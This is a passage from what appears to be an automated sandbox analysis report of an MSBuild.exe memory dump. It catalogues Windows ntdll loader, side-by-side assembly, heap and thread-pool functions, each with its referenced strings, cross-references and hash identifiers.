                                                                                                              • Instruction ID: 99e8a95ecd3e46a4e8bc2f157e670209696b5ed5efda78eaef95c9c94b2a8784
                                                                                                              • Opcode Fuzzy Hash: 41715c15822ad2d6df214d347bab8e0ea5d94cc086f80d85ed167616973f667e
                                                                                                              • Instruction Fuzzy Hash: FEE04F766403547BC620BB5ADC41FD777ADDFC5764F008429FA4867181C6B1790087F4
                                                                                                              Function 01152C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 181 1152c0a-1152c0f 182 1152c11-1152c18 181->182 183 1152c1f-1152c26 LdrInitializeThunk 181->183
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 862d2e00b54952e649897569a7ab2fad74c36f8df576f96cc91bc6f63b0648b9
                                                                                                              • Instruction ID: 775a4f7fb2e93a96f8d9df3b689a9b457a25d286df91556b084168dbfbe86990
                                                                                                              • Opcode Fuzzy Hash: 862d2e00b54952e649897569a7ab2fad74c36f8df576f96cc91bc6f63b0648b9
                                                                                                              • Instruction Fuzzy Hash: 67B09B729015C5C5DB55E764470871B790477D0701F25C061D6130641F4739C1D1E275

                                                                                                              Non-executed Functions

                                                                                                              Function 01192349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2160512332
                                                                                                              • Opcode ID: 72b268f614786a935b6d002a25b42da61fe7000b300d23817009e10c82f272e6
                                                                                                              • Instruction ID: 4409f6d4ce749cc8de424cd17c4a0156074efd1098514c073c115887008f6ac5
                                                                                                              • Opcode Fuzzy Hash: 72b268f614786a935b6d002a25b42da61fe7000b300d23817009e10c82f272e6
                                                                                                              • Instruction Fuzzy Hash: C4929E71604342AFEB29CF29C880F6BB7E8BB84754F04492DFAA5D7251D774E844CB92
                                                                                                              Function 01148620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • Address of the debug info found in the active list., xrefs: 011854AE, 011854FA
                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01185543
                                                                                                              • Thread identifier, xrefs: 0118553A
                                                                                                              • Critical section address, xrefs: 01185425, 011854BC, 01185534
                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011854E2
                                                                                                              • 8, xrefs: 011852E3
                                                                                                              • Invalid debug info address of this critical section, xrefs: 011854B6
                                                                                                              • double initialized or corrupted critical section, xrefs: 01185508
                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011854CE
                                                                                                              • corrupted critical section, xrefs: 011854C2
                                                                                                              • Critical section address., xrefs: 01185502
                                                                                                              • Critical section debug info address, xrefs: 0118541F, 0118552E
                                                                                                              • undeleted critical section in freed memory, xrefs: 0118542B
                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0118540A, 01185496, 01185519
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                              • API String ID: 0-2368682639
                                                                                                              • Opcode ID: 49e910a31329e91d038022643859fe49ff592c36e1f8d251279c30722468bb9a
                                                                                                              • Instruction ID: d1f6b90d3c12e204f70f61ac4ccc46c74fe5bb3ca2152cfd5184e4914c33adea
                                                                                                              • Opcode Fuzzy Hash: 49e910a31329e91d038022643859fe49ff592c36e1f8d251279c30722468bb9a
                                                                                                              • Instruction Fuzzy Hash: 0981A2B1A40348EFDB69CF99C845BAEBBB5FB04B04F10811EF644BB650D371A941CB50
                                                                                                              Function 011429F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • @, xrefs: 0118259B
                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011822E4
                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0118261F
                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01182409
                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011825EB
                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01182498
                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011824C0
                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01182506
                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01182602
                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01182412
                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01182624
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                              • API String ID: 0-4009184096
                                                                                                              • Opcode ID: 4f2b29edd37816ef34a62add80ed52446b587b7b1e100ce11f3081beac5e6b97
                                                                                                              • Instruction ID: 1fb3172bc13a4ed3f67f2d2d9c01227b32c33a747eb1e604df8229f14a96950a
                                                                                                              • Opcode Fuzzy Hash: 4f2b29edd37816ef34a62add80ed52446b587b7b1e100ce11f3081beac5e6b97
                                                                                                              • Instruction Fuzzy Hash: E80280B1D002299BDB39DB54CC80BD9B7B8AF54704F4141DAEA09A7241DB709FC4CF69
                                                                                                              Function 011B8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                              • API String ID: 0-2515994595
                                                                                                              • Opcode ID: dab58d47a2ef8fab73fbec4375f4f06188a7e6bf7b2370e665db6e26fa6fe36e
                                                                                                              • Instruction ID: edfa8b24a236b49b5b1009cdd321f7a220716e1a24ff82de6debdfe8518712c2
                                                                                                              • Opcode Fuzzy Hash: dab58d47a2ef8fab73fbec4375f4f06188a7e6bf7b2370e665db6e26fa6fe36e
                                                                                                              • Instruction Fuzzy Hash: 6851A0B15043069BD32DDF19C988BEBBBECAF94A54F144A1EE999C3241E770D604CBD2
                                                                                                              Function 011C0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                              • API String ID: 0-1700792311
                                                                                                              • Opcode ID: 796a668570e38f62653964e16299a2e527045c1ac40c04d3581a58778aa09739
                                                                                                              • Instruction ID: cf62e1b778cddff9748c2c0927e7f16a5faf5ba0bf7da80ed9a18751cc923ab5
                                                                                                              • Opcode Fuzzy Hash: 796a668570e38f62653964e16299a2e527045c1ac40c04d3581a58778aa09739
                                                                                                              • Instruction Fuzzy Hash: 65D1ED39904682DFDB2ADF68C444AAEFBF1FF6AB04F08805DF5859B252C7749981CB14
                                                                                                              Function 011989B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • VerifierFlags, xrefs: 01198C50
                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01198A3D
                                                                                                              • HandleTraces, xrefs: 01198C8F
                                                                                                              • VerifierDebug, xrefs: 01198CA5
                                                                                                              • VerifierDlls, xrefs: 01198CBD
                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 01198B8F
                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01198A67
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                              • API String ID: 0-3223716464
                                                                                                              • Opcode ID: f80d3d25d2264a20b1e21c3e8eab3a85809393b73f529a18be4052f074de9c5d
                                                                                                              • Instruction ID: 6a80a2507c0040f08d12d4d848991e03507951a812795b17f3aeebbf2628a563
                                                                                                              • Opcode Fuzzy Hash: f80d3d25d2264a20b1e21c3e8eab3a85809393b73f529a18be4052f074de9c5d
                                                                                                              • Instruction Fuzzy Hash: 4291467164135AAFDF2AEF289884F5A77E4AF55B18F05051CFA51AF282C730EC41CB91
                                                                                                              Function 0111EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                              • API String ID: 0-1109411897
                                                                                                              • Opcode ID: f8890b4d2183348e5826ff39f1d3cc9988c4f33432d14e5df43b2c988c547828
                                                                                                              • Instruction ID: 7b7d525d5046cff27fd936ce948564081f103c6251602d305ee22f24ee980c41
                                                                                                              • Opcode Fuzzy Hash: f8890b4d2183348e5826ff39f1d3cc9988c4f33432d14e5df43b2c988c547828
                                                                                                              • Instruction Fuzzy Hash: 58A25874A0562A8FDB69CF18CC987A9FBB1AF45304F1442E9D90DA7394DB309E85CF01
                                                                                                              Function 011463FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-792281065
                                                                                                              • Opcode ID: b93df9ba80f56e787e61b22e5f0ceed70c91f3edf4c339c19c365edfe7a7fb02
                                                                                                              • Instruction ID: 5736c612b12f6784a95e1f1b169dd99c94f9173704258c238a15a7b3d9634c03
                                                                                                              • Opcode Fuzzy Hash: b93df9ba80f56e787e61b22e5f0ceed70c91f3edf4c339c19c365edfe7a7fb02
                                                                                                              • Instruction Fuzzy Hash: F0912C30B00316DBEB2EEF58E849BAA7BA1BF51F1CF04411DD5106BA82DB749841CB91
                                                                                                              Function 0110645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01169A01
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01169A11, 01169A3A
                                                                                                              • apphelp.dll, xrefs: 01106496
                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011699ED
                                                                                                              • LdrpInitShimEngine, xrefs: 011699F4, 01169A07, 01169A30
                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01169A2A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-204845295
                                                                                                              • Opcode ID: 00db174715be06ed35451c948c1261fdb08e04e612fd6385f83c940fc78c8538
                                                                                                              • Instruction ID: 9a03d47a78dcb0439fdb42254ccd00f47f450a934b7214ba92c4ccbadcf9778e
                                                                                                              • Opcode Fuzzy Hash: 00db174715be06ed35451c948c1261fdb08e04e612fd6385f83c940fc78c8538
                                                                                                              • Instruction Fuzzy Hash: F15100716083049FE72EDF24D845BAB77E8FB84648F00091EF5859B1A1E771E914CB92
                                                                                                              Function 01142674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0118219F
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01182165
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01182178
                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01182160, 0118219A, 011821BA
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01182180
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011821BF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                              • API String ID: 0-861424205
                                                                                                              • Opcode ID: 0d268405bbf4fed0b80cee0ea7ea17c31e7d6f035c846cb6a2f06b855b3ffb88
                                                                                                              • Instruction ID: 592c0c68dc34388186aeb7001e2f619ad4b91e23b1c1e169fad27c075089e0cc
                                                                                                              • Opcode Fuzzy Hash: 0d268405bbf4fed0b80cee0ea7ea17c31e7d6f035c846cb6a2f06b855b3ffb88
                                                                                                              • Instruction Fuzzy Hash: 6A314B3AF402157BEB2ADA999C42F5B7F78DF65E80F05405DFB04AB140D3709A41C7A2
                                                                                                              Function 0114C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01188170
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01188181, 011881F5
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0114C6C3
                                                                                                              • LdrpInitializeImportRedirection, xrefs: 01188177, 011881EB
                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 011881E5
                                                                                                              • LdrpInitializeProcess, xrefs: 0114C6C4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-475462383
                                                                                                              • Opcode ID: ad3fbb1d32b645b83a4a476992ee2567a2ecf96c2e425422a19e8fe589145657
                                                                                                              • Instruction ID: e74547d38e8bcc41617a16e49ecfeeac62cec1e34aac92bcc4d34ee9e9a1fc7d
                                                                                                              • Opcode Fuzzy Hash: ad3fbb1d32b645b83a4a476992ee2567a2ecf96c2e425422a19e8fe589145657
                                                                                                              • Instruction Fuzzy Hash: C03102716457429FD328EB28D84AE1AB7D5AFD4B14F00455CF9856B291E720EC05CBA2
                                                                                                              Function 0115096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 01152DF0: LdrInitializeThunk.NTDLL ref: 01152DFA
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01150BA3
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01150BB6
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01150D60
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01150D74
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 1404860816-0
                                                                                                              • Opcode ID: c358d82716b32567a3f2d352f90c7f5c2c3b2ab88ff0bf86f2c26a1cdfc19742
                                                                                                              • Instruction ID: 089be91dbe1dc2e84ac12b810476df8cd2a877f5a056e46a61476e1d61675d08
                                                                                                              • Opcode Fuzzy Hash: c358d82716b32567a3f2d352f90c7f5c2c3b2ab88ff0bf86f2c26a1cdfc19742
                                                                                                              • Instruction Fuzzy Hash: 15427E71900719DFDB69CF68C880BAAB7F4FF48304F1485A9E999DB241E770A984CF61
                                                                                                              Function 0111A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                              • API String ID: 0-379654539
                                                                                                              • Opcode ID: ac2841516501b941bcc4dfc0367ee7a7388129912e0f0db35fd747d11b876abf
                                                                                                              • Instruction ID: 725c69ebf63d8a4b36e3865ec912949617682f3dab777b4525cc2d0a6423359e
                                                                                                              • Opcode Fuzzy Hash: ac2841516501b941bcc4dfc0367ee7a7388129912e0f0db35fd747d11b876abf
                                                                                                              • Instruction Fuzzy Hash: 6FC18870109382CFD719CF58D040B6ABBF4BF84708F04886AF9958B659E738DA4ACB53
                                                                                                              Function 01148402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0114855E
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01148421
                                                                                                              • @, xrefs: 01148591
                                                                                                              • LdrpInitializeProcess, xrefs: 01148422
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1918872054
                                                                                                              • Opcode ID: 0c7ea7baeedd8e7656fceb51676a191d1e5b07711d1d94b7c90edfc17e6d7410
                                                                                                              • Instruction ID: ee7a41e231f919c565cda3252f3f80b8136acbae334d1217a3af1c0733849784
                                                                                                              • Opcode Fuzzy Hash: 0c7ea7baeedd8e7656fceb51676a191d1e5b07711d1d94b7c90edfc17e6d7410
                                                                                                              • Instruction Fuzzy Hash: 29917C71508345EFD729EF65C840FABBAE8FB84B58F44492EFA8496151E334D904CBA2
                                                                                                              Function 0114273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011822B6
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 011821DE
                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011821D9, 011822B1
                                                                                                              • .Local, xrefs: 011428D8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                              • API String ID: 0-1239276146
                                                                                                              • Opcode ID: 8de97ab12e6b429885ed9ad4005161fdd3f8d44890fac2c4373d4b4091485497
                                                                                                              • Instruction ID: 98d98c66484d74bdebb17cd26012b2bc1068b764f960a7267e6060139e4b6337
                                                                                                              • Opcode Fuzzy Hash: 8de97ab12e6b429885ed9ad4005161fdd3f8d44890fac2c4373d4b4091485497
                                                                                                              • Instruction Fuzzy Hash: 73A1F13590022ADBDB2DCF68D884BA9B7B1BF58754F1541E9E908AB251E7309EC1CF81
                                                                                                              Function 011164AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011710AE
                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0117106B
                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01170FE5
                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01171028
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                              • API String ID: 0-1468400865
                                                                                                              • Opcode ID: 193852b17d8165c4bc59127d8e83d7923f0edc434c3ce1c64c2c506a949e46ed
                                                                                                              • Instruction ID: f1c0d9f02dcd4bfc69508f4e2956b4422b4ba48747dab6cc6bbc0a4a296bd306
                                                                                                              • Opcode Fuzzy Hash: 193852b17d8165c4bc59127d8e83d7923f0edc434c3ce1c64c2c506a949e46ed
                                                                                                              • Instruction Fuzzy Hash: E971D0B1904305EFCB65DF14C884B97BFA9AF55798F000468F9498B28AD375D588CFD2
                                                                                                              Function 0113245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0117A9A2
                                                                                                              • apphelp.dll, xrefs: 01132462
                                                                                                              • LdrpDynamicShimModule, xrefs: 0117A998
                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0117A992
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
